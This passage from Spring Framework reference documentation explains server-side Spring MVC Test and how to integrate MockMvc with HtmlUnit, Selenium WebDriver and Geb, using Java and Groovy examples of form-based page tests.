result and verify something that\ncannot be verified otherwise. 
This can be achieved by appending `.andReturn()` after all
other expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	MvcResult mvcResult = mockMvc.perform(post("/persons")).andExpect(status().isOk()).andReturn();
	// ...
----

If all tests repeat the same expectations you can set up common expectations once
when building the `MockMvc` instance:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	standaloneSetup(new SimpleController())
		.alwaysExpect(status().isOk())
		.alwaysExpect(content().contentType("application/json;charset=UTF-8"))
		.build()
----

Note that common expectations are __always__ applied and cannot be overridden without
creating a separate `MockMvc` instance.

When JSON response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using JsonPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/people").accept(MediaType.APPLICATION_JSON))
		.andExpect(jsonPath("$.links[?(@.rel == 'self')].href").value("http://localhost:8080/people"));
----

When XML response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using XPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	Map<String, String> ns = Collections.singletonMap("ns", "http://www.w3.org/2005/Atom");
	mockMvc.perform(get("/handle").accept(MediaType.APPLICATION_XML))
		.andExpect(xpath("/person/ns:link[@rel='self']/@href", ns).string("http://localhost:8080/people"));
----

[[spring-mvc-test-server-filters]]
===== Filter Registrations
When setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();
----

Registered filters will be invoked through the `MockFilterChain` from `spring-test`, and the
last filter will delegate to the `DispatcherServlet`.

[[spring-mvc-test-vs-end-to-end-integration-tests]]
===== Differences between Out-of-Container and End-to-End Integration Tests

As mentioned earlier, __Spring MVC Test__ is built on the Servlet API mock objects from
the `spring-test` module and does not use a running Servlet container. Therefore
there are some important differences compared to full end-to-end integration tests
with an actual client and server running.

The easiest way to think about this is starting with a blank `MockHttpServletRequest`.
Whatever you add to it is what the request will be. Things that may catch you by surprise
are that there is no context path by default, no `jsessionid` cookie, no forwarding, error,
or async dispatches, and therefore no actual JSP rendering. Instead, "forwarded" and
"redirected" URLs are saved in the `MockHttpServletResponse` and can be asserted with
expectations.
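For example, a brief sketch with hypothetical mappings, assuming that `forwardedUrl()`
and `redirectedUrl()` are statically imported from `MockMvcResultMatchers`:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	// assert the URL the request was forwarded to (hypothetical view mapping)
	mockMvc.perform(get("/view")).andExpect(forwardedUrl("/WEB-INF/jsp/view.jsp"));

	// assert the URL the response redirects to (hypothetical mapping)
	mockMvc.perform(post("/persons")).andExpect(redirectedUrl("/persons/1"));
----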
The same is true for rendering JSON, XML, and other formats via\n`@ResponseBody` methods.\n\nAlternatively, you may consider the full end-to-end integration testing support from\nSpring Boot via `@WebIntegrationTest`. See the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].\n\nThere are pros and cons for each approach. The options provided in __Spring MVC Test__\nare different stops on the scale from classic unit testing to full integration testing.\nTo be certain, none of the options in Spring MVC Test fall under the category of classic\nunit testing, but they _are_ a little closer to it. For example, you can isolate the web\nlayer by injecting mocked services into controllers, in which case you're testing the web\nlayer only through the `DispatcherServlet` but with actual Spring configuration, just\nlike you might test the data access layer in isolation from the layers above. Or you\ncan use the standalone setup, focusing on one controller at a time and manually providing\nthe configuration required to make it work.\n
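\nAs a minimal sketch of these ideas, the following mocks the service layer and uses the standalone setup for a single controller; the `PersonController`, `PersonService`, and `Person` types are hypothetical, and Mockito's `mock` and `when` are assumed to be statically imported:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ mock the service layer so that only the web layer is exercised\n\tPersonService personService = mock(PersonService.class);\n\twhen(personService.findById(42L)).thenReturn(new Person(\"Joe\"));\n\n\t\/\/ one controller at a time, with manually provided configuration\n\tMockMvc mockMvc = standaloneSetup(new PersonController(personService)).build();\n----\n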
\nAnother important distinction when using __Spring MVC Test__ is that conceptually such\ntests are on the _inside_ of the server side, so you can check what handler was used,\nif an exception was handled with a `HandlerExceptionResolver`, what the content of the\nmodel is, what binding errors there were, etc. That means it's easier to write\nexpectations since the server is not a black box as it is when testing it through\nan actual HTTP client. This is generally an advantage of classic unit testing: it's\neasier to write, reason about, and debug, but it does not replace the need for full\nintegration tests. At the same time, it's important not to lose sight of the fact that\nthe response is the most important thing to check. In short, there is room here for\nmultiple styles and strategies of testing even within the same project.\n\n\n[[spring-mvc-test-server-resources]]\n===== Further Server-Side Test Examples\nThe framework's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples[many\nsample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples\nfor further ideas. Also the\nhttps:\/\/github.com\/spring-projects\/spring-mvc-showcase[spring-mvc-showcase] has full test\ncoverage based on Spring MVC Test.\n\n\n[[spring-mvc-test-server-htmlunit]]\n==== HtmlUnit Integration\n\nSpring provides integration between <<spring-mvc-test-server,MockMvc>> and\nhttp:\/\/htmlunit.sourceforge.net\/[HtmlUnit]. This simplifies performing end-to-end testing\nwhen using HTML based views. This integration enables developers to:\n\n* Easily test HTML pages using tools such as http:\/\/htmlunit.sourceforge.net\/[HtmlUnit],\nhttp:\/\/seleniumhq.org\/projects\/webdriver\/[WebDriver], and\nhttp:\/\/www.gebish.org\/manual\/current\/testing.html#spock_junit__testng[Geb] without the\nneed to deploy to a Servlet container\n* Test JavaScript within pages\n* Optionally test using mock services to speed up testing\n* Share logic between in-container end-to-end tests and out-of-container integration tests\n\n[NOTE]\n====\n`MockMvc` works with templating technologies that do not rely on a Servlet Container (e.g.,\nThymeleaf, Freemarker, Velocity, etc.), but it does not work with JSPs since they rely on\nthe Servlet Container.\n====\n\n[[spring-mvc-test-server-htmlunit-why]]\n===== Why HtmlUnit Integration?\n\nThe most obvious question that comes to mind is, \"Why do I need this?\". The answer is best\nfound by exploring a very basic sample application. Assume you have a Spring MVC web\napplication that supports CRUD operations on a `Message` object. The application also supports\npaging through all messages. How would you go about testing it?\n\nWith Spring MVC Test, we can easily test if we are able to create a `Message`.\n\n[source,java]\n----\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t.param(\"summary\", \"Spring Rocks\")\n\t.param(\"text\", \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t.andExpect(status().is3xxRedirection())\n\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nWhat if we want to test our form view that allows us to create the message? For example,\nassume our form looks like the following snippet:\n\n[source,xml]\n----\n<form id=\"messageForm\" action=\"\/messages\/\" method=\"post\">\n <div class=\"pull-right\"><a href=\"\/messages\/\">Messages<\/a><\/div>\n\n <label for=\"summary\">Summary<\/label>\n <input type=\"text\" class=\"required\" id=\"summary\" name=\"summary\" value=\"\" \/>\n\n <label for=\"text\">Message<\/label>\n <textarea id=\"text\" name=\"text\"><\/textarea>\n\n <div class=\"form-actions\">\n\t<input type=\"submit\" value=\"Create\" \/>\n <\/div>\n<\/form>\n----\n\nHow do we ensure that our form will produce the correct request to create a new message? A\nnaive attempt would look like this:\n\n[source,java]\n----\nmockMvc.perform(get(\"\/messages\/form\"))\n\t.andExpect(xpath(\"\/\/input[@name='summary']\").exists())\n\t.andExpect(xpath(\"\/\/textarea[@name='text']\").exists());\n----\n\nThis test has some obvious drawbacks. If we update our controller to use the parameter\n`message` instead of `text`, our form test would continue to pass even though the HTML\nform is out of sync with the controller.\n
To resolve this we can combine our two tests.\n\n[[spring-mvc-test-server-htmlunit-mock-mvc-test]]\n[source,java]\n----\nString summaryParamName = \"summary\";\nString textParamName = \"text\";\nmockMvc.perform(get(\"\/messages\/form\"))\n\t\t.andExpect(xpath(\"\/\/input[@name='\" + summaryParamName + \"']\").exists())\n\t\t.andExpect(xpath(\"\/\/textarea[@name='\" + textParamName + \"']\").exists());\n\nMockHttpServletRequestBuilder createMessage = post(\"\/messages\/\")\n\t\t.param(summaryParamName, \"Spring Rocks\")\n\t\t.param(textParamName, \"In case you didn't know, Spring Rocks!\");\n\nmockMvc.perform(createMessage)\n\t\t.andExpect(status().is3xxRedirection())\n\t\t.andExpect(redirectedUrl(\"\/messages\/123\"));\n----\n\nThis would reduce the risk of our test incorrectly passing, but there are still some\nproblems.\n\n* What if we have multiple forms on our page? Admittedly we could update our xpath\n expressions, but they get more complicated the more factors we take into account (Are the\n fields the correct type? Are the fields enabled? etc.).\n* Another issue is that we are doing double the work we would expect.\n We must first verify the view, and then we submit the view with the same parameters we just\n verified. Ideally this could be done all at once.\n* Finally, there are some things that we still cannot account for. For example, what if the\n form has JavaScript validation that we wish to test as well?\n\nThe overall problem is that testing a web page does not involve a single interaction.\nInstead, it is a combination of how the user interacts with a web page and how that web\npage interacts with other resources. For example, the result of a form view is used as\nthe input to a user for creating a message. In addition, our form view may potentially\nutilize additional resources which impact the behavior of the page, such as JavaScript\nvalidation.\n\n[[spring-mvc-test-server-htmlunit-why-integration]]\n====== Integration testing to the rescue?\n\nTo resolve the issues above we could perform end-to-end integration testing, but this has\nsome obvious drawbacks. Consider testing the view that allows us to page through the messages.\nWe might need the following tests.\n\n* Does our page display a notification to the user indicating that no results are available\nwhen the messages are empty?\n* Does our page properly display a single message?\n* Does our page properly support paging?\n\nTo set up these tests, we would need to ensure our database contained the proper messages\nin it. This leads to a number of additional challenges.\n\n* Ensuring the proper messages are in the database can be tedious; consider foreign key\n constraints.\n* Testing can become slow since each test would need to ensure that the database is in the\n correct state.\n* Since our database needs to be in a specific state, we cannot run tests in parallel.\n* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.\n\nThese challenges do not mean that we should abandon end-to-end integration testing\naltogether. Instead, we can reduce the number of end-to-end integration tests by\nrefactoring our detailed tests to use mock services which will execute much faster, more\nreliably, and without side effects. 
We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. 
Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. 
This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! 
Of course, this violates the _DRY Principle_, so\nwe should ideally extract this code into its own method as follows.\n\n[source,java]\n----\npublic HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {\n\tsetSummary(currentPage, summary);\n\t\/\/ ...\n}\n\npublic void setSummary(HtmlPage currentPage, String summary) {\n\tHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\n\tsummaryInput.setValueAttribute(summary);\n}\n----\n\nThis ensures that we do not have to update all of our tests if we change the UI.\n\nWe might even take this a step further and place this logic within an object that\nrepresents the `HtmlPage` we are currently on.\n\n[source,java]\n----\npublic class CreateMessagePage {\n\n\tfinal HtmlPage currentPage;\n\n\tfinal HtmlTextInput summaryInput;\n\n\tfinal HtmlSubmitInput submit;\n\n\tpublic CreateMessagePage(HtmlPage currentPage) {\n\t\tthis.currentPage = currentPage;\n\t\tthis.summaryInput = currentPage.getHtmlElementById(\"summary\");\n\t\tthis.submit = currentPage.getHtmlElementById(\"submit\");\n\t}\n\n\tpublic <T> T createMessage(String summary, String text) throws Exception {\n\t\tsetSummary(summary);\n\n\t\tHtmlPage result = submit.click();\n\t\tboolean error = CreateMessagePage.at(result);\n\n\t\treturn (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));\n\t}\n\n\tpublic void setSummary(String summary) throws Exception {\n\t\tsummaryInput.setValueAttribute(summary);\n\t}\n\n\tpublic static boolean at(HtmlPage page) {\n\t\treturn \"Create Message\".equals(page.getTitleText());\n\t}\n}\n----\n\nFormally, this pattern is known as the\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/PageObjects[Page Object Pattern]. While we can\ncertainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the\nfollowing sections to make this pattern much easier to implement.\n\n[[spring-mvc-test-server-htmlunit-webdriver-setup]]\n====== MockMvc and WebDriver Setup\n\nTo use Selenium WebDriver with the Spring MVC Test framework, make sure that your project\nincludes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.\n\nWe can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the\n`MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>.\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-webdriver-usage]]\n====== MockMvc and WebDriver Usage\n\nNow we can use WebDriver as we normally would, but without the need to deploy our\napplication to a Servlet container.\n
For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that `CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttp:\/\/selenium.googlecode.com\/git\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory#Making_the_Example_Work_Using_Annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. 
For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/GettingStarted[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. 
However, Geb makes things even easier by taking care of some of the\nboilerplate code for us.\n\n[[spring-mvc-test-server-htmlunit-geb-setup]]\n====== MockMvc and Geb Setup\n\nWe can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`\nas follows.\n\n[source,groovy]\n----\ndef setup() {\n\tbrowser.driver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build()\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-geb-usage]]\n====== MockMvc and Geb Usage\n\nNow we can use Geb as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following:\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,groovy]\n----\nwhen:\nform.summary = expectedSummary\nform.text = expectedMessage\nsubmit.click(ViewMessagePage)\n----\n\nAny unrecognized method calls or property accesses\/references that are not found will be\nforwarded to the current page object. This removes a lot of the boilerplate code we needed\nwhen using WebDriver directly.\n\nAs with direct WebDriver usage, this improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and\nWebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based\n`CreateMessagePage` implementation.\n\n[source,groovy]\n----\nclass CreateMessagePage extends Page {\n\tstatic url = 'messages\/form'\n\tstatic at = { assert title == 'Messages : Create'; true }\n\tstatic content = {\n\t\tsubmit { $('input[type=submit]') }\n\t\tform { $('form') }\n\t\terrors(required:false) { $('label.error, .alert-error')?.text() }\n\t}\n}\n----\n\nThe first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't\ngo over the details of `Page`, but in summary it contains common functionality for all of\nour pages. The next thing you will notice is that we define a URL in which this page can\nbe found. This allows us to navigate to the page as follows.\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe also have an `at` closure that determines if we are at the specified page. It should return\n`true` if we are on the correct page. 
